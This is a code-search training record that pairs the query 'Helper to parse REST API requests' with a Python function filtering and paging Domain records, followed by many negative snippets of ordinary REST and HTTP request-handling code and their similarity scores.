rndc_call.extend([rndc_op])\n rndc_call.extend([domain['name']])\n\n LOG.debug('Calling RNDC with: %s' % \" \".join(rndc_call))\n utils.execute(*rndc_call)\n\n nzf_name = glob.glob('%s/*.nzf' % cfg.CONF[self.name].nzf_path)\n\n output_file = os.path.join(output_folder, 'zones.config')\n\n shutil.copyfile(nzf_name[0], output_file)", "def domain_command():\n # 1. Get input host from Demisto\n domain = demisto.args().get('domain')\n # 2. Get the host reputation from SlashNext API\n response = domain_lookup(domain=domain)\n if response.get('errorNo') != 0:\n return\n # 3. Parse and format the response\n dbot_score_cont, domain_cont = get_dbot_std_context(\n domain, 'Domain', response.get('threatData').get('verdict'), response.get('threatData').get('threatType'))\n\n snx_ioc_cont = get_snx_host_ioc_context(domain, 'Domain', response.get('threatData'))\n\n ec = {\n 'SlashNext.Domain(val.Value === obj.Value)': snx_ioc_cont,\n 'DBotScore': dbot_score_cont,\n 'Domain': domain_cont\n }\n\n domain = domain.encode('idna')\n\n title = 'SlashNext Phishing Incident Response - Domain Lookup\\n' \\\n '##### domain = {}'.format(domain.decode())\n\n md = tableToMarkdown(\n title,\n snx_ioc_cont,\n ['Value',\n 'Type',\n 'Verdict',\n 'ThreatStatus',\n 'ThreatName',\n 'ThreatType',\n 'FirstSeen',\n 'LastSeen']\n )\n\n return_outputs(md, ec, snx_ioc_cont)" ]
[ "0.7216133", "0.6992674", "0.69599164", "0.6770144", "0.6691671", "0.6631902", "0.66250306", "0.66209924", "0.6600841", "0.65592813", "0.6530738", "0.65130335", "0.6412239", "0.63919693", "0.63866", "0.6360199", "0.6326602", "0.6326602", "0.63022065", "0.6297731", "0.62386405", "0.62386405", "0.61449534", "0.6136164", "0.6086499", "0.6071909", "0.60690707", "0.60583305", "0.60529774", "0.5997694", "0.5984268", "0.5932513", "0.58942485", "0.58505356", "0.5827994", "0.5824701", "0.5771238", "0.5711579", "0.5702976", "0.56488836", "0.563843", "0.5634274", "0.5633698", "0.5633692", "0.56034106", "0.5600067", "0.5564031", "0.5545289", "0.5544413", "0.5518701", "0.5506365", "0.5499301", "0.5481803", "0.54809284", "0.5480885", "0.5479211", "0.5471982", "0.546999", "0.54531664", "0.54449815", "0.54416597", "0.5427975", "0.5405719", "0.5403485", "0.5395135", "0.53715026", "0.53544825", "0.532646", "0.53215456", "0.531863", "0.53147995", "0.5311568", "0.52971745", "0.52846295", "0.52830845", "0.52821213", "0.52788365", "0.5275867", "0.52699816", "0.5268582", "0.526732", "0.5263039", "0.5251198", "0.5236147", "0.52318805", "0.52309597", "0.52281725", "0.5225839", "0.5223581", "0.5222234", "0.52195996", "0.5213422", "0.5207288", "0.52052873", "0.5194012", "0.518894", "0.5188412", "0.51849335", "0.51753587", "0.5165281" ]
0.77741724
0
Helper to parse REST API requests
def render(args): query = database.session_query(Domain) filt = args.pop("filter") certificate_id = args.pop("certificate_id", None) if filt: terms = filt.split(";") query = database.filter(query, Domain, terms) if certificate_id: query = query.join(Certificate, Domain.certificates) query = query.filter(Certificate.id == certificate_id) return database.sort_and_page(query, Domain, args)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse (self, request):\n\n data = {}\n body_start = request.find('\\r\\n\\r\\n')\n if body_start == -1:\n data['body'] = None\n else:\n data['body'] = request[body_start+4:]\n parts = request.split(' ', 2)\n data['method'] = parts[0]\n data['resource'] = parts[1]\n return (data)", "def opt_engine_rest_api():\n request_json = request.get_json()\n return process_request(request_json)", "def handle_rest_api(request, response):\n url_fragments = urlparse.urlparse(request.url)\n query_options = urlparse.parse_qs(url_fragments.query)\n api_endpoint = url_fragments.path.rsplit('/', 2)[1]\n\n # Use API endpoint to load reference JSON data\n with open(os.path.join(HERE, 'data', '%s.json' % api_endpoint), 'r') as f:\n data = json.loads(f.read())\n\n def do_filter(entry):\n result = True\n\n for option, values in query_options.iteritems():\n # Don't handle options which are not properties of the entry\n if option not in entry:\n continue\n\n for value in values:\n if isinstance(entry[option], int):\n result &= entry[option] == int(value)\n else:\n result &= entry[option] == value\n\n return result\n\n if api_endpoint == 'jobs':\n data['results'] = filter(do_filter, data['results'])\n\n elif api_endpoint == 'job-log-url':\n data = filter(do_filter, data)\n\n return data", "def process_request(self, req, resp, resource, params):", "def parse_request(req):\n # Parsing out the request body\n data = req.get_json()\n if (data is None or\n 'action' not in data or\n 'task_id' not in data or\n 'release_id' not in data):\n abort(400)\n \n action = data['action']\n task = data['task_id']\n release = data['release_id']\n return action, task, release", "def __apiRequest(self, url, parms={}):\n authparms = self.__addAuthParms(parms);\n request = self.http.request('GET', url, fields=authparms)\n if request.status != 200:\n raise ApiCommunicationError('Failed to retrieve data from Marvel, HTTP Status {}'.format(request.status))\n else:\n return json.loads( request.data.decode('utf-8') )", "def parse_api(self, soup):\n return {}", "def parse_request(request):\n request_split = request.split()\n method = request_split[0]\n uri = request_split[1]\n protocol = request_split[2]\n print(\"Protocol: \" + protocol)\n headers = request_split[3]\n\n if method != \"GET\":\n raise RequestError(405, \"Method Not Allowed\")\n elif protocol != \"HTTP/1.1\":\n raise RequestError(505, \"HTTP Version Not Supported\")\n elif \"Host:\" not in headers:\n raise RequestError(400, \"Bad Request\")\n else:\n return uri", "def __call_api(self, values):\n # Add auth key to the request dictionary if not supplie\n if 'auth' not in values:\n values['auth'] = self.auth_data['auth']\n\n # Encode the data for a GET request\n data = urllib.parse.urlencode(values)\n\n #print values\n\n # Try to make the request\n xml_string = urllib.request.urlopen(self.xml_rpc + '?' 
+ data).read()\n\n # Parse the XML\n response_data = xmltodict(self.__sanitize(xml_string))\n\n # Ensure that there was XML to parse\n if not response_data:\n return None\n\n # Grab the root element\n response_data = response_data['root'][0]['child']\n\n return response_data", "def parse(self, response):", "def _parse_in_request(self, request):\n error = None\n self.logger.debug(\"Http method: %s\" % request.method)\n if request.method == 'GET':\n self._params = request.args.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)\n \n elif request.method == 'POST':\n self._params = request.form.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)", "def parse_request(self, request):\n response=''\n http_code = 200\n\n request_line = request.splitlines()[0]\n request_method, path, request_version = request_line.split()\n\n #Try to split path into it's components: the operation requested and the keyvalue\n try:\n request_op, request_keyvalue = path.split('?')\n request_op = request_op[1:]\n\n #If request is a get we split in a different order than if it's a set\n if request_op == 'get':\n request_value, request_key = request_keyvalue.split('=')\n response, http_code = self.get_value(request_key)\n elif request_op == 'set':\n request_key, request_value = request_keyvalue.split('=')\n response, http_code = self.set_value(request_key, request_value)\n else:\n response = 'Unknown operation in URL. Must be either GET or SET.'\n http_code = 400\n\n except ValueError: #Catch any paths that don't match the form we're interested in\n response = dedent(\"\"\"Incorrect path (%s)\n Requested URL must take the form http://%s:%s/[operation]?[value]\"\"\" % (path, self.server_address, self.server_port))\n http_code = 400\n return response, http_code\n\n return response, http_code", "def _parser(self, request, *args, **kwargs):\n\n self.request = request\n\n # parse header\n self.header = {k[5:]: v for k, v in request.META.items() if k.startswith('HTTP_')}\n self.header['CONTENT_TYPE'] = request.META.get('CONTENT_TYPE')\n\n # parse boby\n if request.method not in ['GET', 'HEAD']:\n\n # TODO: serve other body format\n if 'multipart/form-data' in self.header['CONTENT_TYPE']:\n self.body = request.POST.dict()\n\n else:\n # default: application/json\n if self.request.body:\n try:\n self.body = json.loads(self.request.body)\n except Exception as e:\n raise Exception('parse json body error')\n \n # parse query\n self.query = request.GET.dict()\n\n # parse cookie\n self.cookie = {k: v for k, v in request.COOKIES.items()}", "def _parse_response(self, response, all_ops):\n try:\n parsed_response = json.loads(response)\n except Exception, e:\n raise ApiError(e)\n if 'error' in parsed_response: # needed anymore?\n raise ApiError(parsed_response['error'])\n # Return the true API return value.\n return parsed_response", "def rest(method, path, context, body=None):\n\n headers = {\n \"Accept\": \"*/*\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n }\n domain = context['headers']['domain']\n auth = get_auth(context)\n url = get_url(domain, path)\n\n response = requests.request(method, url, headers=headers, json=body, auth=auth)\n\n if response.status_code >= 400:\n raise Exception(\"Error: \", response.text)\n\n return json.loads(response.text)", "def get(self):\r\n request = http.Request('GET', self.get_url())\r\n\r\n return request, parsers.parse_json", "def get(self):\r\n request = http.Request('GET', self.get_url())\r\n\r\n return request, parsers.parse_json", "def 
get(self):\r\n request = http.Request('GET', self.get_url())\r\n\r\n return request, parsers.parse_json", "def get(self):\r\n request = http.Request('GET', self.get_url())\r\n\r\n return request, parsers.parse_json", "def parse(self, request):\n result = {}\n if request.method.lower() == 'post':\n params = request.get_json(\n cache=False) if request.mimetype == 'application/json' else request.form\n else:\n params = request.args\n for arg in self.args:\n if arg.name in params:\n if arg.type is not None and type(params[arg.name]) != arg.type:\n try:\n result[arg.name] = arg.coerce(params[arg.name])\n except Exception as err:\n current_app.logger.warning('Coercion failed for param: {}'.format(arg.name))\n raise ApiError('Coercion failed for param: {}'.format(arg.name), 'ArgsParserException', 1, status_code=400)\n abort(400)\n else:\n result[arg.name] = params[arg.name]\n elif arg.required:\n current_app.logger.warning(\"Missing required param: {}\".format(arg.name))\n raise ApiError('Missing required param: {}'.format(arg.name), 'ArgsParserException', 2, status_code=400)\n abort(400)\n else:\n result[arg.name] = arg.default\n return result", "def func_PARSE(self):\n self.parsed_url = parse.urlparse(\"http://{0}:{1}{2}\".format(args.HTTP_HOST, args.HTTP_PORT, self.path).lower())\n self.parsed_param = parse.parse_qs(self.parsed_url[4])", "def normalize_api_url(self):\n def tester(self, api_url):\n \"\"\"\n Attempts to fetch general information about the MediaWiki instance\n in order to test whether *api_url* will return JSON.\n \"\"\"\n data = self._fetch_http(api_url, {'action': 'query',\n 'meta': 'siteinfo'})\n try:\n data_json = json.loads(data)\n return (data, data_json)\n except ValueError:\n return (data, None)\n\n data, data_json = tester(self, self._api_url)\n if data_json:\n return self._api_url\n else:\n # if there's an index.php in the URL, we might find the API\n if 'index.php' in self._api_url:\n test_api_url = self._api_url.split('index.php')[0] + 'api.php'\n print test_api_url\n test_data, test_data_json = tester(self, test_api_url)\n print (test_data, test_data_json)\n if test_data_json:\n self._api_url = test_api_url\n return self._api_url\n return None", "def _parse_request(self):\n if len(self.request.body) > 0:\n try:\n return tornado.escape.json_decode(self.request.body)\n except Exception:\n #Not Json, Using Form data\n return self.request.arguments\n else:\n return self.request.arguments", "def _api_request(self, endpoint, params=None):\n \n if params:\n response = requests.get(url=f\"{self.api_url}/{endpoint}\", headers={\"Authorization\":self.auth_header},\n params=params)\n else:\n response = requests.get(url=f\"{self.api_url}/{endpoint}\", headers={\"Authorization\":self.auth_header})\n code = response.status_code\n if 200 <= code < 300:\n logging.debug(f\"API call: {self.api_url}/{endpoint} | {code}\")\n encoding = response.encoding\n raw = response.content\n return json.loads(raw.decode(encoding))\n elif code > 500:\n raise APIAuthException\n else:\n logging.error(f\"ERROR: Bad API call: {self.api_url}/{endpoint} | {code}\")", "def api_root(request, format=None):\n return Response({\n 'judges' : reverse('user-list',request=request),\n 'pilots': reverse('pilot-list', request=request),\n 'marks': reverse('mark-list', request=request),\n 'results' : reverse('results-detail', request=request),\n })", "def api_convert():\n try:\n rest_data = request.get_json()\n text = rest_data.get('text')\n return jsonify({'text': process_text(text)})\n except Exception as e:\n 
response = jsonify({'error': 'API error'})\n response.status_code = 400\n return response", "def parse_request(request):\n\n method, path, version = request.split(\"\\r\\n\")[0].split(\" \")\n if method != \"GET\":\n raise NotImplementedError\n return path", "def parse_response(self):\n pass", "def _make_request(self):\n response = urllib2.urlopen(\n url=self.api_url,\n data=self._get_request_data()\n )\n content = response.read()\n return json.loads(content.decode('utf8'))", "def request_endpoints(self):\n\n endpoints_url = self.std[\"api\"]\n endpoints_paramd = {\n \"access_token\": self.std[\"access_token\"]\n }\n\n endpoints_response = requests.get(url=endpoints_url, params=endpoints_paramd)\n print endpoints_response\n self.endpointd = endpoints_response.json()[0]", "def _api_call(self, **kwargs):\n params = {\n 'format': 'json',\n }\n params.update(kwargs)\n r = requests.get(self.api_base_url, params=params)\n return r.json()", "def api():\n try:\n data = json.loads(request.data)\n except:\n return jsonify({\"jsonrpc\": \"2.0\", \"error\": {\"code\": -32700, \"message\": \"Parse error\"}, \"id\": None}), 500\n return jsonify(hwi.jsonrpc(data))", "def api_root(request, format=None):\n return Response({\n 'users': reverse('user-list', request=request),\n 'tweets': reverse('tweet-list', request=request),\n })", "def parse_request(self, request):\n request.process_inputs()", "def parse_response(self, response: Any) -> Any:\n return response", "async def _api_request(self,\n method: str,\n path_url: str,\n params: Dict[str, Any] = {}) -> Dict[str, Any]:\n base_url = f\"https://{global_config_map['gateway_api_host'].value}:\" \\\n f\"{global_config_map['gateway_api_port'].value}\"\n url = f\"{base_url}/{path_url}\"\n client = await self._http_client()\n if method == \"get\":\n if len(params) > 0:\n response = await client.get(url, params=params)\n else:\n response = await client.get(url)\n elif method == \"post\":\n response = await client.post(url, data=params)\n\n parsed_response = json.loads(await response.text())\n if response.status != 200:\n err_msg = \"\"\n if \"error\" in parsed_response:\n err_msg = f\" Message: {parsed_response['error']}\"\n raise IOError(f\"Error fetching data from {url}. 
HTTP status is {response.status}.{err_msg}\")\n if \"error\" in parsed_response:\n raise Exception(f\"Error: {parsed_response['error']}\")\n\n return parsed_response", "def __request(self,endpoint):\n apiRequest = requests.get(\"%s/%s\" % (self.baseurl,endpoint), \n auth=requests.auth.HTTPBasicAuth(self.api_id, self.api_secret))\n try:\n json = apiRequest.json()\n return json\n except JSONDecodeError:\n print(\"Failed to download or failed to parse JSON.\")\n print(apiRequest)\n return None", "def run_rest_api(num_from,num_to,server):\n if not server.endswith('/'):\n server += '/'\n rest_full_url = server+'rest/prod/range/'\n if num_from and num_to:\n rest_full_url += f'?from={num_from}&to={num_to}'\n try:\n response = requests.get(rest_full_url)\n results = response.json()\n except requests.exceptions.RequestException as e: # This is the correct syntax\n raise SystemExit(e)\n return results", "def api_root(request, format=None):\n\n return Response({\n 'entities': reverse('entity-list', request=request),\n 'budgets': reverse('budget-list', request=request),\n 'actuals': reverse('actual-list', request=request),\n })", "def test_get_api_resources(self):\n pass", "def api_root(request, format=None):\n return Response({\n 'users': reverse('user-list', request=request),\n 'groups': reverse('group-list', request=request),\n 'pools': reverse('pool-list', request=request),\n })", "def parse_http_request(source_addr, http_raw_data):\n r1 = http_raw_data.split('\\n')[0]\n method = r1.split()[0]\n path = r1.split()[1]\n if path == \"/\":\n r2 = http_raw_data.split('\\n')[1]\n host = r2.split()[0]\n if host == \"Host:\":\n host = re.sub(\"[:]\", \"\", host)\n r3 = r2.split(':')\n url = r2.split()[1]\n headers = []\n r3 = ' '.join(r3).replace('\\r', '').split()\n headers.append(r3)\n headers.append(url)\n headers\n requested_host = headers[0:]\n requested_path = path\n portno = re.findall(r'[0-9]+', r2)\n if portno == []:\n portno = \"80\"\n requested_port = portno\n requested_host = url\n print(\"*\" * 50)\n print(\"[parse_http_request] Implement me!\")\n print(\"*\" * 50)\n # Replace this line with the correct values.\n request_info = HttpRequestInfo(source_addr, method, requested_host, requested_port, requested_path, headers)\n return request_info", "def _api_request(date: str, api_url: str) -> Dict[str, str]:\n try:\n data = json.loads(urlopen(\n Request(f\"{api_url}?at={quote(date)}\")\n ).read().decode('utf-8'))\n except HTTPError as e:\n data = json.loads(e.file.read().decode('utf-8'))\n if \"message\" in data:\n raise ValidationError(data[\"message\"])\n else:\n raise ValidationError(f\"Service unavailable ({e}\")\n return data", "def _parse_content(response):\n if response.status_code != 200:\n raise ApiError(f'unknown error: {response.content.decode()}')\n result = json.loads(response.content)\n if not result['ok']:\n raise ApiError(f'{result[\"error\"]}: {result.get(\"detail\")}')\n return result", "def _process_request(self, request, response):\n ...", "def api_root(request, format=None):\n\n return Response(OrderedDict([\n #('class', reverse(\"class-list\", request=request, format=format)),\n ]))", "def getJsonFromApi(urlAPI: AnyStr) -> Any:\n\n if validaURL(urlAPI):\n return requestToApi(urlAPI)\n else:\n print(f\"La url \\\"{urlAPI}\\\" no es válida.\")\n return None", "def dispatchRequest (self, base_path=\"\", path_info=\"/\", params={}, request_method = \"GET\", post_data = None, accepts = \"\"): \n response_code = \"200 OK\"\n host = base_path\n request = None\n content_types = {\n 
'application/vnd.google-earth.kml+xml': 'KML',\n 'application/json': 'GeoJSON',\n 'text/javascript': 'GeoJSON',\n 'application/rss+xml': 'GeoRSS',\n 'text/html': 'HTML',\n 'osm': 'OSM',\n 'gml': 'WFS',\n 'wfs': 'WFS',\n 'kml': 'KML',\n 'json': 'GeoJSON',\n 'georss': 'GeoRSS',\n 'atom': 'GeoRSS',\n 'html': 'HTML',\n 'geojson':'GeoJSON'\n } \n \n path = path_info.split(\"/\")\n \n found = False\n \n format = \"\"\n \n if params.has_key(\"format\"):\n format = params['format']\n if format.lower() in content_types:\n format = content_types[format.lower()]\n found = True\n \n if not found and len(path) > 1:\n path_pieces = path[-1].split(\".\")\n if len(path_pieces) > 1:\n format = path_pieces[-1]\n if format.lower() in content_types:\n format = content_types[format.lower()]\n found = True\n \n if not found and accepts:\n if accepts.lower() in content_types:\n format = content_types[accepts.lower()]\n found = True\n \n if not found and not format:\n if self.metadata.has_key(\"default_service\"):\n format = self.metadata['default_service']\n else: \n format = \"GeoJSON\"\n \n service_module = __import__(\"Service.%s\" % format, globals(), locals(), format)\n service = getattr(service_module, format)\n request = service(self)\n \n response = []\n \n request.parse(params, path_info, host, post_data, request_method)\n \n # short circuit datasource where the first action is a metadata request. \n if len(request.actions) and request.actions[0].method == \"metadata\": \n return request.encode_metadata(request.actions[0])\n \n datasource = self.datasources[request.datasource] \n \n if request_method != \"GET\" and hasattr(datasource, 'processes'):\n raise Exception(\"You can't post data to a processed layer.\") \n\n \n datasource.begin()\n try:\n for action in request.actions:\n method = getattr(datasource, action.method)\n result = method(action)\n response += result \n datasource.commit()\n except:\n datasource.rollback()\n raise\n \n if hasattr(datasource, 'processes'):\n for process in datasource.processes.split(\",\"):\n if not self.processes.has_key(process): \n raise Exception(\"Process %s configured incorrectly. 
Possible processes: \\n\\n%s\" % (process, \",\".join(self.processes.keys() ))) \n response = self.processes[process].dispatch(features=response, params=params)\n\n mime, data = request.encode(response)\n data = data.encode(\"utf-8\") \n return (mime, data)", "def rest_api_request_handler(self, request_type):\n result = {}\n success_code = 0\n with self.resource_lock:\n if request_type == self.RestRequest.REST_MUTS:\n result = self.muts # Returns MUTs\n elif request_type == self.RestRequest.REST_TEST_SPEC:\n result = self.test_spec # Returns Test Specification\n elif request_type == self.RestRequest.REST_TEST_RESULTS:\n pass # Returns test results\n else:\n success_code = -1\n return json.dumps(self.get_rest_result_template(result, 'request/' + request_type, success_code), indent=4)", "def api_root(request, format=None):\n return Response({\n 'actions': reverse('actions', request=request, format=format),\n 'assets': reverse('assets', request=request, format=format),\n 'cvi': reverse('cvi', request=request, format=format),\n 'devices': reverse('devices', request=request, format=format),\n 'functions': reverse('functions', request=request, format=format),\n 'groups': reverse('groups', request=request, format=format),\n 'impacts': reverse('impacts', request=request, format=format),\n 'missions': reverse('missions', request=request, format=format),\n 'network': reverse('network', request=request, format=format),\n 'risk-appetite': reverse('risk-appetite', request=request, format=format),\n 'threats': reverse('threats', request=request, format=format),\n 'vulnerabilities': reverse('vulnerabilities', request=request, format=format)\n })", "def api_root():\n\treturn jsonify({\n\t\t\"/\": ['GET'],\n\t\t\"/status\": ['GET'],\n\t\t\"/refresh\": ['GET'],\n\t\t\"/credit\": ['GET', 'PUT', 'PATCH'],\n\t\t\"/items\": ['GET', 'POST'],\n\t\t\"/items/<string:name>\": ['GET', 'PUT', 'PATCH', 'DELETE'],\n\t\t\"/items/<string:name>/price\": ['GET'],\n\t\t\"/channels\": ['GET', 'POST'],\n\t\t\"/channels/<int:channel>\": ['GET', 'PUT', 'PATCH', 'DELETE'],\n\t\t\"/channels/<int:channel>/price\": ['GET'],\n\t\t\"/channels/<int:channel>/vend\": ['POST'],\n\t\t\"/vend\": ['POST'],\n\t})", "async def rest_handler(request):\n # verify the request\n valid, reason = await verify_rest_request(request)\n if not valid:\n return generate_error(reason, 400)\n json = await request.json()\n # get the parameters\n cmd = json['cmd']\n params = json['params']\n # pass off to the correct target handler\n if cmd == 'find':\n response = await _find_handler(request, params)\n elif cmd == 'stats':\n response = await _stats_handler(request, params)\n elif cmd == 'download':\n response = await _download_handler(request, params)\n elif cmd == 'upload':\n response = await _upload_handler(request, params)\n elif cmd == 'provision':\n response = await _provision_handler(request, params)\n # return the response we get back fgrom the handler\n return response", "def _parse_api_base_data (self, netflix_page_data):\n api_data = {};\n important_fields = [\n 'API_BASE_URL',\n 'API_ROOT',\n 'BUILD_IDENTIFIER',\n 'ICHNAEA_ROOT'\n ]\n\n # values are accessible via dict (sloppy parsing successfull)\n if type(netflix_page_data) == dict:\n for important_field in important_fields:\n api_data.update({important_field: netflix_page_data.get(important_field, '')})\n return api_data\n\n for item in netflix_page_data:\n if 'serverDefs' in dict(item).keys():\n for important_field in important_fields:\n api_data.update({important_field: 
item['serverDefs']['data'][important_field]})\n return api_data", "def test_request_root(self):\n response = requests.get(self.url + '/')\n\n self.assertEqual(response.status_code, 200)\n\n json = response.json()\n self.assertIsInstance(json, dict)\n self.assertEqual(len(json.keys()), 2)\n self.assertIn('users', json.keys())\n self.assertIn('groups', json.keys())\n\n users = json.get('users')\n groups = json.get('groups')\n self.assertIsInstance(users, list)\n self.assertIsInstance(groups, list)\n self.assertEqual(len(users), 2)\n self.assertEqual(len(groups), 3)\n self.assertIn('John', users)\n self.assertIn('Jane', users)\n self.assertIn('Human', groups)\n self.assertIn('Male', groups)\n self.assertIn('Female', groups)", "def parseRequest(req):\n\treqHeaders = {}\n\treqLine = ''\n\tlineNum = 0\n\n\tfor line in req.splitlines():\n\t\tif line == '':\n\t\t\tbreak\n\t\telif lineNum == 0:\n\t\t\treqLine = line\n\t\t\tlineNum = 1\n\t\telse:\n\t\t\tsplitLine = line.split(' ', 1)\n\t\t\treqHeaders[splitLine[0]] = splitLine[1]\n\n\tsplitReqLine = reqLine.split(' ')\n\tmethod = splitReqLine[0]\n\tpath = splitReqLine[1]\n\tversion = splitReqLine[2]\n\n\treturn method, path, version, reqHeaders", "def _get_request(url_root,api_key,path,response_type,params, ssl_verify):\n url = _url_builder(url_root,api_key,path,params)\n content = _fetch(url, ssl_verify)\n response = _dispatch(response_type)(content)\n return response", "def probe_api():\n\n info = loads(get(url).text)\n return info", "def apicall():\r\n# try:\r\n print request.get_json()\r\n test_json = request.get_json()\r\n logger.info(\"input json object loaded\")\r\n logger.info(test_json)\r\n k=MetaData(test_json)\r\n int_res=k.getData()\r\n print '------------------------------'\r\n print int_res\r\n return jsonify(int_res)", "def api_root(request, format=None):\n # Buffer\n buff = OrderedDict()\n # Collection\n collection = buff.setdefault('collection', OrderedDict())\n collection['version'] = '1.0'\n collection['href'] = reverse(\n 'api-root', request=request, format=format)\n # Items\n items = collection.setdefault('items', OrderedDict())\n # Accounts\n accounts = items.setdefault('accounts', OrderedDict())\n a_acct = accounts.setdefault('answers', OrderedDict())\n a_acct['href'] = reverse('answer-list', request=request, format=format)\n a_acct.update(media_type_factory(act_views.AnswerList))\n q_acct = accounts.setdefault('questions', OrderedDict())\n q_acct['href'] = reverse('question-list', request=request, format=format)\n q_acct.update(media_type_factory(act_views.QuestionList))\n u_acct = accounts.setdefault('users', OrderedDict())\n u_acct['href'] = reverse('user-list', request=request, format=format)\n u_acct.update(media_type_factory(act_views.UserList))\n in_acct = accounts.setdefault('login', OrderedDict())\n in_acct['href'] = reverse('login', request=request, format=format)\n in_acct.update(media_type_factory(act_views.LoginView))\n out_acct = accounts.setdefault('logout', OrderedDict())\n out_acct['href'] = reverse('logout', request=request, format=format)\n out_acct.update(media_type_factory(act_views.LogoutView))\n ## g_acct = accounts.setdefault('user_groups', OrderedDict())\n ## g_acct['href'] = reverse('group-list', request=request, format=format)\n ## g_acct.update(media_type_factory(act_views.GroupView))\n # Categories\n categories = items.setdefault('categories', OrderedDict())\n cat_list = categories.setdefault('categories', OrderedDict())\n cat_list['href'] = reverse(\n 'category-list', request=request, 
format=format)\n cat_list.update(media_type_factory(cat_views.CategoryList))\n cat_clone = categories.setdefault('category_clone', OrderedDict())\n cat_clone['href'] = reverse(\n 'category-clone', request=request, format=format)\n cat_clone.update(media_type_factory(cat_views.CategoryClone))\n # Invoices\n invoices = items.setdefault('invoices', OrderedDict())\n conditions = invoices.setdefault('conditions', OrderedDict())\n conditions['href'] = reverse(\n 'condition-list', request=request, format=format)\n conditions.update(media_type_factory(inv_views.ConditionList))\n inv_list = invoices.setdefault('items', OrderedDict())\n inv_list['href'] = reverse(\n 'item-list', request=request, format=format)\n inv_list.update(media_type_factory(inv_views.ItemList))\n inv_items = invoices.setdefault('invoices', OrderedDict())\n inv_items['href'] = reverse(\n 'invoice-list', request=request, format=format)\n inv_items.update(media_type_factory(inv_views.InvoiceList))\n inv_item_list = invoices.setdefault('invoice_items', OrderedDict())\n inv_item_list['href'] = reverse(\n 'invoice-item-list', request=request, format=format)\n inv_item_list.update(media_type_factory(inv_views.InvoiceItemList))\n # Maintenance\n locations = items.setdefault('locations', OrderedDict())\n loc_set_list = locations.setdefault('location_set_name', OrderedDict())\n loc_set_list['href'] = reverse(\n 'location-set-name-list', request=request, format=format)\n loc_set_list.update(media_type_factory(loc_views.LocationSetNameList))\n loc_fmt = locations.setdefault('location_format', OrderedDict())\n loc_fmt['href'] = reverse(\n 'location-format-list', request=request, format=format)\n loc_fmt.update(media_type_factory(loc_views.LocationFormatList))\n loc_code = locations.setdefault('location_code', OrderedDict())\n loc_code['href'] = reverse(\n 'location-code-list', request=request, format=format)\n loc_code.update(media_type_factory(loc_views.LocationCodeList))\n loc_clone = locations.setdefault('location_clone', OrderedDict())\n loc_clone['href'] = reverse(\n 'location-clone', request=request, format=format)\n loc_clone.update(media_type_factory(loc_views.LocationClone))\n # Projects\n projects = items.setdefault('projects', OrderedDict())\n proj_type = projects.setdefault('inventory_types', OrderedDict())\n proj_type['href'] = reverse(\n 'inventory-type-list', request=request, format=format)\n proj_type.update(media_type_factory(pro_views.InventoryTypeList))\n proj_list = projects.setdefault('projects', OrderedDict())\n proj_list['href'] = reverse(\n 'project-list', request=request, format=format)\n proj_list.update(media_type_factory(pro_views.ProjectList))\n # Regions\n regions = items.setdefault('regions', OrderedDict())\n countries = regions.setdefault('countries', OrderedDict())\n countries['href'] = reverse(\n 'country-list', request=request, format=format)\n countries.update(media_type_factory(reg_views.CountryList))\n subdivisions = regions.setdefault('subdivisions', OrderedDict())\n subdivisions['href'] = reverse(\n 'subdivision-list', request=request, format=format)\n subdivisions.update(media_type_factory(reg_views.SubdivisionList))\n currencies = regions.setdefault('currencies', OrderedDict())\n currencies['href'] = reverse(\n 'currency-list', request=request, format=format)\n currencies.update(media_type_factory(reg_views.CurrencyList))\n languages = regions.setdefault('languages', OrderedDict())\n languages['href'] = reverse(\n 'language-list', request=request, format=format)\n 
languages.update(media_type_factory(reg_views.LanguageList))\n timezones = regions.setdefault('timezones', OrderedDict())\n timezones['href'] = reverse(\n 'timezone-list', request=request, format=format)\n timezones.update(media_type_factory(reg_views.TimeZoneList))\n # Suppliers\n suppliers = items.setdefault('suppliers', OrderedDict())\n supp = suppliers.setdefault('suppliers', OrderedDict())\n supp['href'] = reverse(\n 'supplier-list', request=request, format=format)\n supp.update(media_type_factory(sup_views.SupplierList))\n return Response(buff)", "def test_api_base(self):\n # load api base\n r = requests.get('{server}/api/0.1/'.format(\n server=self.get_server_url()))\n j = r.json()\n self.assertIn('gages', j)\n self.assertIn('sections', j)\n self.assertIn('regions', j)\n self.assertIn('rivers', j)\n self.assertIn('sensors', j)\n self.assertIn('samples', j)", "def __exec_request(self, URL) -> Any:\n headers = {\n \"X-ELS-APIKey\": self.config['apikey'],\n \"Accept\": 'application/json'\n }\n\n request = requests.get(\n URL,\n headers=headers\n )\n self._status_code = request.status_code\n\n if request.status_code == 200:\n return json.loads(request.text, strict=False)\n else:\n return \"failed\"", "def _perform_request(self, req):\n \n res = req.content\n x = json.loads(res, object_hook=lambda d: namedtuple('X', d.keys())(*d.values()))\n return x", "def handle(self, content):\n # Check the API request\n serializer = ApiRequestSerializer(data=content)\n if not serializer.is_valid():\n return self.consumer.send_to_client(\n {\"topic\": \"api\", \"type\": \"error\", \"message\": \"invalid-request\"}\n )\n\n # Make request\n method = serializer.validated_data[\"method\"]\n url = serializer.validated_data[\"url\"]\n payload = serializer.validated_data.get(\"payload\", None)\n logger.info(\"API {}:{}:{}\".format(method, url, payload))\n\n response = getattr(self.client, method)(url, data=payload, follow=True)\n\n # Return to client\n # API response\n to_client = {\n \"topic\": \"api\",\n \"type\": \"response\",\n \"status_code\": response.status_code,\n }\n if response.get(\"Content-Type\") == \"application/json\":\n to_client[\"content\"] = response.json()\n else:\n to_client[\"content\"] = content\n\n # Original request params\n to_client.update({\"method\": method, \"url\": url})\n if payload is not None:\n to_client[\"payload\"] = payload\n\n self.consumer.send_to_client(to_client)", "def request(host=API_HOST, path=SEARCH_PATH, api_key=API_KEY, url_params=params):\n url_params = url_params or {}\n url = '{0}{1}'.format(host, quote(path.encode('utf8')))\n headers = {\n 'Authorization': 'Bearer %s' % api_key,\n }\n\n response = requests.request('GET', url, headers=headers, params=url_params)\n\n return response.json()", "def parse_api(baseurl):\n\t# Make 4 api calls in total\n\tfor call in range(1, 5):\n\t\t# Write an error to file if no response after 4 attempts\n\t\tif call == 4:\n\t\t\twith open('errors.txt', 'a') as file:\n\t\t\t\tfile.write(\"Server is not responding after 4 attempts. Time: {}\\n\".format(\n\t\t\t\t\tdt_to_string(datetime.datetime.now())\n\t\t\t\t))\n\t\t\treturn 